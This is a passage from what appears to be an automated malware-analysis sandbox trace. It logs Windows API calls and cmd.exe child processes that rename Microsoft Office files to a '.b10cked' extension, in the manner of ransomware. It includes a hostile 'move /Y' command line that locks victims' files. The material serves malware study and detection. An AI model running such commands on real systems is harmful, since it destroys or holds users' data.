(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwv~1.trx")) returned 0x2020 [0172.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.635] SetErrorMode (uMode=0x0) returned 0x0 [0172.635] SetErrorMode (uMode=0x1) returned 0x0 [0172.635] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2af0cc, lpFilePart=0x2af0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", lpFilePart=0x2af0b4*="OUTLWV~1.TRX") returned 0x3c [0172.635] SetErrorMode (uMode=0x0) returned 0x1 [0172.635] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.635] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0172.635] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0172.635] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwv~1.trx")) returned 0x2020 [0172.636] SetErrorMode (uMode=0x0) returned 0x0 [0172.636] SetErrorMode (uMode=0x1) returned 0x0 [0172.636] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2af548, lpFilePart=0x2af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", lpFilePart=0x2af2e0*="OUTLWV~1.TRX") returned 0x3c [0172.636] SetErrorMode (uMode=0x0) returned 0x1 [0172.636] SetErrorMode (uMode=0x0) returned 0x0 [0172.636] SetErrorMode (uMode=0x1) returned 0x0 [0172.636] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af750, lpFilePart=0x2af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x2af2e0*="OUTLWVW.DLL.trx_dll.b10cked") returned 0x4b [0172.636] SetErrorMode (uMode=0x0) returned 0x1 [0172.636] SetLastError (dwErrCode=0x0) [0172.636] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll.b10cked")) returned 0xffffffff [0172.636] GetLastError () returned 0x2 [0172.636] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2aec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec5c) returned 0x82130 [0172.636] FindNextFileW (in: hFindFile=0x82130, lpFindFileData=0x2aec5c | out: lpFindFileData=0x2aec5c) returned 0 [0172.637] GetLastError () returned 0x12 [0172.637] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0172.638] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x81cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81cc0) returned 0x82130 [0172.638] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.638] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0172.638] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll")) returned 0x2020 [0172.638] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.639] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0172.639] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeea8 | out: _Buffer=" 1") returned 9 [0172.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.639] GetFileType (hFile=0x7) returned 0x2 [0172.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aee34 | out: lpMode=0x2aee34) returned 1 [0172.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aee68 | out: lpConsoleScreenBufferInfo=0x2aee68) returned 1 [0172.639] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.640] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aeea8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.640] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aee8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aee8c*=0x1a) returned 1 [0172.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.640] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.640] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.640] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.640] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.640] SetConsoleInputExeNameW () returned 0x1 [0172.640] GetConsoleOutputCP () returned 0x1b5 [0172.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.640] exit (_Code=0) Process: id = "296" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23022 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23023 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23024 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23025 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 23026 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23027 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23028 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23029 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23030 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23031 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23393 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23394 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23395 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23396 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 23397 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 23398 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23399 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23400 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23401 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23402 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23403 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23404 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23405 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23406 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23407 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 23408 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23409 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23410 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23411 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23412 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23413 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23414 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23415 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23416 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 364 os_tid = 0x9ac [0172.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcd4 | out: lpSystemTimeAsFileTime=0x1cfcd4*(dwLowDateTime=0x9c8186a0, dwHighDateTime=0x1d440a9)) [0172.142] GetCurrentProcessId () returned 0x9bc [0172.142] GetCurrentThreadId () returned 0x9ac [0172.142] GetTickCount () returned 0x322ea [0172.143] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfccc | out: lpPerformanceCount=0x1cfccc*=22893175265) returned 1 [0172.143] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.143] __set_app_type (_Type=0x1) [0172.143] __p__fmode () returned 0x76b331f4 [0172.143] __p__commode () returned 0x76b331fc [0172.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.144] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.144] GetCurrentThreadId () returned 0x9ac [0172.144] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x38 [0172.144] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.144] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.144] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.144] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.144] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc64 | out: phkResult=0x1cfc64*=0x0) returned 0x2 [0172.145] VirtualQuery (in: lpAddress=0x1cfc9b, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0172.145] GetConsoleOutputCP () returned 0x1b5 [0172.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.145] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.150] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.150] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.151] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.151] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.151] GetEnvironmentStringsW () returned 0x260210* [0172.151] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.151] GetEnvironmentStringsW () returned 0x260210* [0172.151] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.151] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebd4 | out: phkResult=0x1cebd4*=0x40) returned 0x0 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0xa0, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegCloseKey (hKey=0x40) returned 0x0 [0172.152] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebd4 | out: phkResult=0x1cebd4*=0x40) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegCloseKey (hKey=0x40) returned 0x0 [0172.152] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0172.152] srand (_Seed=0x5b886387) [0172.152] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" [0172.152] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" [0172.152] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.153] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.153] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.153] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.153] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.153] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.153] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.153] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.153] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.153] GetEnvironmentStringsW () returned 0x262360* [0172.154] FreeEnvironmentStringsW (penv=0x262360) returned 1 [0172.154] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.154] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.154] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.154] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.154] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.154] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.154] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.154] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9a0, lpFilePart=0x1cf99c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf99c*="Desktop") returned 0x18 [0172.154] GetFileAttributesW 